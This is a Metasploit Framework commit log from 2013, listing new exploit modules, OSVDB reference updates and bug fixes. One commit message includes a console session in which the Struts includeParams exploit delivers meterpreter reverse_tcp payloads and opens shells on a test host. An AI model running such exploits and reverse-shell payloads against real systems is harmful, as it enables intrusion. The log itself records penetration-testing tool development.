8dd7a664b4
Give a chance to FileDropper too
2013-07-24 08:57:43 -05:00
04b9e3a3e6
Add module for CVE-2013-2251
2013-07-24 08:52:02 -05:00
458ac5f289
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-17 15:02:33 -05:00
73fd14a500
Fix [SeeRM #8239 ] NoMethodError undefined method
2013-07-16 15:59:52 -05:00
c4485b127c
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-04 19:43:38 -05:00
8772cfa998
Add support for PLESK on php_cgi_arg_injection
2013-07-04 08:24:25 -05:00
db00599d44
Move carberp_backdoor_exec to unix webapp exploits foler
2013-06-30 10:00:14 -05:00
d990c7f21f
Dat line
2013-06-29 09:46:36 -07:00
ec7c9b039a
Further refactoring requested
2013-06-29 09:45:22 -07:00
8542342ff6
Merge branch 'carberp_backdoor_exec' of git@github.com:bwall/metasploit-framework.git into carberp_backdoor_exec
2013-06-28 22:45:03 -07:00
b8cada9ab0
Applied some refactoring to decrease line count
2013-06-28 22:44:23 -07:00
9486364cc4
Added Steven K's email
2013-06-28 15:31:17 -07:00
fe0e16183c
Carberp backdoor eval PoC
2013-06-28 14:47:13 -07:00
3c1af8217b
Land #2011 , @matthiaskaiser's exploit for cve-2013-2460
2013-06-26 14:35:22 -05:00
81a2d9d1d5
Merge branch 'module_java_jre17_provider_skeleton' of https://github.com/matthiaskaiser/metasploit-framework
2013-06-26 14:32:59 -05:00
4fa789791d
Explain Ranking
2013-06-25 13:10:15 -05:00
127300c62d
Fix also ruby module
2013-06-25 12:59:42 -05:00
0c306260be
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-25 09:13:01 -05:00
4df943d1a2
CVE and OSVDB update
2013-06-25 02:06:20 -05:00
e9fccb8dbd
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-24 22:07:48 -05:00
24b7d19ecc
Fix target regex and wfsdelay
2013-06-24 14:56:43 -05:00
98fddb6ce1
up to date
2013-06-24 11:57:11 -05:00
f7650a4b18
Fix wrong local variable
2013-06-24 11:35:26 -05:00
8a96b7f9f2
added Java7u21 RCE module
...
Click2Play bypass doesn't seem to work anymore.
2013-06-24 02:04:38 -04:00
785639148c
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-20 17:18:42 -05:00
4cc1f2440d
Land #1996 , references for several modules
2013-06-20 11:32:55 -05:00
322ba27f0f
re-order refs
2013-06-20 11:17:23 -05:00
22026352e6
Land #1995 , OSVDB reference for Gitorious
2013-06-20 10:51:51 -05:00
66f4424202
fix formatting
2013-06-20 10:41:14 -05:00
a3a5dec369
add osvdb ref 94441
2013-06-20 08:03:34 -05:00
a824a0583e
add osvdb ref 89059
2013-06-20 07:34:15 -05:00
89f649ab99
add osvdb ref 89026
2013-06-20 07:28:29 -05:00
2b55e0e0a6
add osvdb ref 64171
2013-06-20 07:17:22 -05:00
d19bd7a905
add osvdb 85739, cve 2012-5159, edb 21834
2013-06-20 07:01:59 -05:00
6cc7d9ccae
add osvdb ref 85446 and edb ref 20500
2013-06-20 06:54:06 -05:00
ee21120c04
add osvdb ref 85509
2013-06-20 06:47:10 -05:00
ade970afb8
add osvdb ref 89322
2013-06-20 06:44:22 -05:00
42690a5c48
add osvdb ref 77492
2013-06-20 06:38:47 -05:00
0dca5ede7e
add osvdb ref 78480
2013-06-20 06:07:08 -05:00
29bc169507
add osvdb ref 64171
2013-06-20 06:00:05 -05:00
869438cb73
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-19 19:57:40 -05:00
81b4efcdb8
Fix requires for PhpEXE
...
And incidentally fix some msftidy complaints
2013-06-19 16:27:59 -05:00
fd397db6e0
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-18 14:09:33 -05:00
b514124997
Land #1979 - OSVDB update
2013-06-18 10:42:09 -05:00
fbd16a2f3e
Land #1978 - OSVDB update
2013-06-18 10:41:33 -05:00
1e46f7df48
Land #1977 - OSVDB update
2013-06-18 10:40:55 -05:00
e278ac5061
add osvdb ref 91841
2013-06-18 06:41:30 -05:00
404a9f0669
add osvdb ref 89594
2013-06-18 06:25:57 -05:00
27158d89c7
add osvdb ref 89105
2013-06-18 06:15:29 -05:00
2afc90a8de
fix typos
2013-06-18 06:05:45 -05:00
2c3181b56b
add osvdb ref 90627
2013-06-18 05:59:39 -05:00
de1561363e
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-17 16:43:33 -05:00
b51349ed77
Land #1968 , OSVDB reference for ManageEngine
2013-06-17 10:30:05 -05:00
8fac0aaf6b
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-17 08:24:39 -05:00
e37a0b871f
add osvdb ref 86562
2013-06-17 06:04:54 -05:00
6e57ecab59
add osvdb ref 79246 and edb ref 18492
2013-06-17 05:58:00 -05:00
e17ccdda3a
add osvdb ref 68662
2013-06-16 18:11:13 -05:00
11bf17b0d6
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-15 11:55:22 -05:00
0cf2751ec1
Land #1965 , OSVDB reference for pBot
2013-06-15 07:39:25 -05:00
d35dd73328
add osvdb ref 84913
2013-06-15 07:30:23 -05:00
638175a6be
Land #1964 , OSVDB reference for StorageWorks
2013-06-15 07:27:43 -05:00
0c6157694f
add osvdb ref 82087
2013-06-15 07:22:32 -05:00
6e8b844954
add osvdb ref 89611
2013-06-15 07:12:44 -05:00
63483a979d
add osvdb ref 89611
2013-06-15 07:09:26 -05:00
0b9cf213df
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-12 12:03:10 -05:00
45da645717
Update ff svg exploit description to be more accurate.
2013-06-11 12:12:18 -05:00
b20a38add4
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-10 12:22:52 -05:00
f58e279066
Cleanup on module names, descriptions.
2013-06-10 10:52:22 -05:00
9d0047ff74
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-07 16:44:52 -05:00
79bfdf3ca6
Add comment to explain the applet delivery methods
2013-06-07 14:20:21 -05:00
641fd3c6ce
Add also the msf module
2013-06-07 13:39:19 -05:00
6497e5c7a1
Move exploit under the linux tree
2013-06-04 08:53:18 -05:00
0bf2f51622
Land #1843 , @viris exploit for CVE-2013-0230
2013-06-04 08:52:09 -05:00
86c768ad02
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-04 08:15:28 -05:00
8ced3483de
Deleted some undeeded comments and used the text_rand function rather than static values.
2013-06-04 08:44:47 +02:00
ad87065b9a
Land #1904 - Undefined variable 'path' in tomcat_deploy_mgr.rb
2013-06-04 01:35:13 -05:00
71bc06d576
Fix undefined variable in tomcat_mgr_deploy.rb
...
Exploit failed (multi/http/tomcat_mgr_deploy): NameError undefined
local variable or method `path' for #<Msf...>
[06/04/2013 10:14:03] [d(3)] core: Call stack:
modules/exploits/multi/http/tomcat_mgr_deploy.rb:253:in `exploit'
lib/msf/core/exploit_driver.rb:205:in `job_run_proc'
lib/msf/core/exploit_driver.rb:166:in `run'
lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
lib/msf/ui/console/command_dispatcher/exploit.rb:111:in `cmd_exploit'
lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
lib/rex/ui/text/shell.rb:200:in `run'
lib/msf/ui/web/console.rb:71:in `block in initialize'
lib/msf/core/thread_manager.rb💯 in `call'
lib/msf/core/thread_manager.rb💯 in `block in spawn'
Uses path instead of path_tmp in error messages.
2013-06-04 11:19:28 +10:00
4079484968
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-03 15:27:36 -05:00
4cf682691c
New module title and description fixes
2013-06-03 14:40:38 -05:00
df20e79375
Deleted the handle because it's not required and check() function.
2013-06-03 10:18:43 +02:00
36f275d71a
Changed the send_request_raw into send_request_cgi function.
2013-06-03 10:06:24 +02:00
675fbb3045
Deleted the DoS UPnP modules, because they are not relevant to the current branch.
2013-06-03 09:45:29 +02:00
1ceed1e44a
Added corrected MiniUPnP module.
2013-06-03 09:37:04 +02:00
d656360c24
Added CVE-2013-0230 for MiniUPnPd 1.0 stack overflow vulnerability
2013-06-03 09:37:03 +02:00
39e4573d86
Added CVE-2013-0229 for MiniUPnPd < 1.4
2013-06-03 09:37:03 +02:00
f68d35f251
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-01 17:09:23 -05:00
80f1e98952
added osvdb refs
2013-06-01 07:04:43 -05:00
48b14c09e3
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-31 01:12:46 -05:00
146a30ec4d
Do minor cleanup for struts_include_params
2013-05-31 01:01:15 -05:00
a7a754ae1f
Land #1870 , @Console exploit for Struts includeParams injection
2013-05-31 00:59:33 -05:00
eb4162d41b
boolean issue fix
2013-05-30 18:15:33 +01:00
5fa8ecd334
removed magic number 109
...
now calculated from the actual length of all static URL elements
2013-05-30 17:40:43 +01:00
47524a0570
converted request params to hash merge operation
2013-05-30 15:36:01 +01:00
51879ab9c7
removed unnecessary lines
2013-05-30 15:15:10 +01:00
abb0ab12f6
Fix msftidy compliance
2013-05-30 13:10:24 +01:00
5233ac4cbd
Progress bar instead of message spam.
2013-05-30 13:08:43 +01:00
fb388c6463
Chunk length is now "huge" for POST method
...
minor changes to option text and changed HTTPMETHOD to an enum.
2013-05-30 11:30:24 +01:00
ab6a2a049b
Fix issue with JAVA meterpreter failing to work.
...
Was down to the chunk length not being set correctly.
Still need to test against windows.
```
msf exploit(struts_include_params) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Universal
1 Linux Universal
2 Java Universal
msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.0.1 - Meterpreter session 5 closed. Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
2013-05-30 10:35:29 +01:00
d70526f4cc
Renamed as per suggestion
2013-05-30 09:29:26 +01:00
7c38324b76
Considered using the bourne stager.
...
Decided against it as current implementation of JAVA base64
encode/decode appears to be more OS agnostic and robust.
Tidied up a few lines of code and added some more output.
2013-05-29 14:21:23 +01:00
jvazquez-r7
Brian Wallace
(B)rian (Wall)ace
sinn3r
HD Moore
Matthias Kaiser
William Vu
Steve Tornio
James Lee
Joe Vennix
Tod Beardsley
Dejan Lukan
Ruslaideemin
Console